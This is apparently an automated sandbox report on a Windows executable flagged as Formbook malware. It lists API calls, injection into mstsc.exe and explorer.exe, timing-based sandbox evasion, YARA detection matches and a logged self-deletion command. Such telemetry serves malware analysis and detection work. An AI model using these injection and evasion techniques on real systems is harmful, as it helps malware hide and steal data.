Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D098A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D0B040 NtSuspendThread
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09820 NtEnumerateKey
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D099D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09950 NtQueueApcThread
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09A80 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09A10 NtQuerySection
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D0A3B0 NtGetContextThread
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09B00 NtSetValueKey
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D095F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09560 NtWriteFile
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D0AD30 NtSetContextThread
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D096D0 NtCreateKey
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09650 NtQueryValueKey
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09670 NtQueryInformationProcess
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09610 NtEnumerateValueKey
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09770 NtSetInformationFile
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D0A770 NtOpenThread
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09760 NtOpenProcess
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D0A710 NtOpenProcessToken
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A95D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9650 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A96E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A96D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053AAD30 NtSetContextThread
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9560 NtWriteFile
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A95F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053AA710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053AA770 NtOpenThread
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9770 NtSetInformationFile
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9760 NtOpenProcess
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A97A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9950 NtQueueApcThread
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A99D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9820 NtEnumerateKey
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053AB040 NtSuspendThread
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A98A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A98F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9B00 NtSetValueKey
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053AA3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9A20 NtResumeThread
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9A10 NtQuerySection
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053A9A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_01077B90 NtCreateFile
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_01077D70 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_01077C40 NtReadFile
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_01077CC0 NtClose
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_01077B8B NtCreateFile,NtReadFile
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_01077BE2 NtCreateFile
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_01077D6C NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_01077C3A NtReadFile
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_01077CBA NtClose
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 0_2_008F1BC0
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 0_2_00907180
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 0_2_00905189
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 0_2_008FFC1E
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 0_2_00902DAC
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 0_2_00918EF7
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 0_2_00915619
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 0_2_00913F08
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 0_2_0091573D
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00907180
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00905189
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_008F1BC0
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_008FFC1E
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00902DAC
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00918EF7
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00915619
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00913F08
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_0091573D
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D928EC
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00CDB090
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00CF20A0
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D920A8
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D81002
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D9E824
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00CEA830
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00CE99BF
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00CCF900
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00CE4120
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D922AE
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D7FA2B
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D803DA
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D8DBD2
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00CFABD8
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00CFEBB0
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00CEAB40
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00CEA309
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D92B28
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D8D466
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00CD841F
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D925DD
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00CDD5E0
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00CF2581
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D91D55
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D92D07
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00CC0D20
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D92EF7
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D8D616
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00CE6E30
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D9DFCE
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D91FF1
Source: C:\Windows\explorer.exe | Code function: 7_2_04E024F2
Source: C:\Windows\explorer.exe | Code function: 7_2_04E086B2
Source: C:\Windows\explorer.exe | Code function: 7_2_04E0B28B
Source: C:\Windows\explorer.exe | Code function: 7_2_04E04492
Source: C:\Windows\explorer.exe | Code function: 7_2_04E061F2
Source: C:\Windows\explorer.exe | Code function: 7_2_04E07949
Source: C:\Windows\explorer.exe | Code function: 7_2_04E01902
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_05360D20
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_05431D55
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_05432D07
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_054325DD
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_05392581
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0537D5E0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0542D466
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0537841F
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0543DFCE
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_05431FF1
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_05386E30
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0542D616
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_05432EF7
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_05384120
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0536F900
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0538A830
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_05421002
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0543E824
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053920A0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0537B090
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_054328EC
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_054320A8
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_05432B28
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0538AB40
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0539EBB0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0542DBD2
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_054203DA
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0541FA2B
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_054322AE
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0107C162
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_01068A30
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_01062D88
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_01062D90
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_01062FB0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0107AE46
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0107AE43
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: String function: 0090B3E7 appears 54 times
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: String function: 00CCB150 appears 87 times
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: String function: 00900FD0 appears 92 times
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 0536B150 appears 54 times
Source: ASQ2109942.exe, 00000000.00000003.688582587.0000000002516000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs ASQ2109942.exe
Source: ASQ2109942.exe, 00000005.00000002.735257427.0000000000F4F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs ASQ2109942.exe
Source: ASQ2109942.exe, 00000005.00000002.738386719.0000000002B43000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamemstsc.exej% vs ASQ2109942.exe
Source: 0000000C.00000002.924444955.0000000001060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.924444955.0000000001060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.732076102.0000000000601000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.732076102.0000000000601000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.734679280.0000000000930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.734679280.0000000000930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.926694573.0000000005030000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.926694573.0000000005030000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.689992016.00000000008A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.689992016.00000000008A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.734762726.0000000000960000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.734762726.0000000000960000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.926553186.0000000005000000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.926553186.0000000005000000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.ASQ2109942.exe.600000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.ASQ2109942.exe.600000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.ASQ2109942.exe.8a0000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.ASQ2109942.exe.8a0000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.ASQ2109942.exe.8a0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.ASQ2109942.exe.8a0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine | Classification label: mal100.troj.evad.winEXE@8/0@15/8
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6384:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6620:120:WilError_01
Source: ASQ2109942.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ASQ2109942.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: ASQ2109942.exe | ReversingLabs: Detection: 16%
Source: C:\Users\user\Desktop\ASQ2109942.exe | File read: C:\Users\user\Desktop\ASQ2109942.exe
Source: unknown | Process created: C:\Users\user\Desktop\ASQ2109942.exe 'C:\Users\user\Desktop\ASQ2109942.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\Desktop\ASQ2109942.exe C:\Users\user\Desktop\ASQ2109942.exe
Source: unknown | Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ASQ2109942.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ASQ2109942.exe | Process created: C:\Users\user\Desktop\ASQ2109942.exe C:\Users\user\Desktop\ASQ2109942.exe
Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ASQ2109942.exe'
Source: ASQ2109942.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ASQ2109942.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ASQ2109942.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ASQ2109942.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ASQ2109942.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ASQ2109942.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: ASQ2109942.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: ASQ2109942.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000002.937173575.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: ASQ2109942.exe, 00000000.00000003.687298130.0000000002590000.00000004.00000001.sdmp, ASQ2109942.exe, 00000005.00000002.734881448.0000000000CA0000.00000040.00000001.sdmp, mstsc.exe, 0000000C.00000002.927081087.0000000005340000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: ASQ2109942.exe, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL source: ASQ2109942.exe, 00000005.00000002.738243526.0000000002A20000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: ASQ2109942.exe, 00000005.00000002.738243526.0000000002A20000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000002.937173575.0000000005A00000.00000002.00000001.sdmp
          Source: ASQ2109942.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: ASQ2109942.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: ASQ2109942.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: ASQ2109942.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: ASQ2109942.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: ASQ2109942.exe | Static PE information: real checksum: 0x39d6b should be: 0x6686a
          Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 0_2_00901016 push ecx; ret 0_2_00901029
          Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00901016 push ecx; ret 5_2_00901029
          Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D1D0D1 push ecx; ret 5_2_00D1D0E4
          Source: C:\Windows\explorer.exe | Code function: 7_2_04E076ED push es; retf 7_2_04E076EF
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_053BD0D1 push ecx; ret 12_2_053BD0E4
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0107591D pushfd ; retf 12_2_0107592E
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0107C9C9 push ecx; ret 12_2_0107C9CD
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0107AD55 push eax; ret 12_2_0107ADA8
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0107ADA2 push eax; ret 12_2_0107ADA8
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0107ADAB push eax; ret 12_2_0107AE12
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_010747FA push esi; ret 12_2_01074801
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 12_2_0107AE0C push eax; ret 12_2_0107AE12
          Source: C:\Windows\SysWOW64\mstsc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\ASQ2109942.exe | RDTSC instruction interceptor: First address: 00000000006083C4 second address: 00000000006083CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\ASQ2109942.exe | RDTSC instruction interceptor: First address: 000000000060875E second address: 0000000000608764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exe | RDTSC instruction interceptor: First address: 00000000010683C4 second address: 00000000010683CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exe | RDTSC instruction interceptor: First address: 000000000106875E second address: 0000000001068764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00CF6A60 rdtscp 5_2_00CF6A60
          Source: C:\Windows\explorer.exe TID: 6828 | Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 6456 | Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exe | Last function: Thread delayed
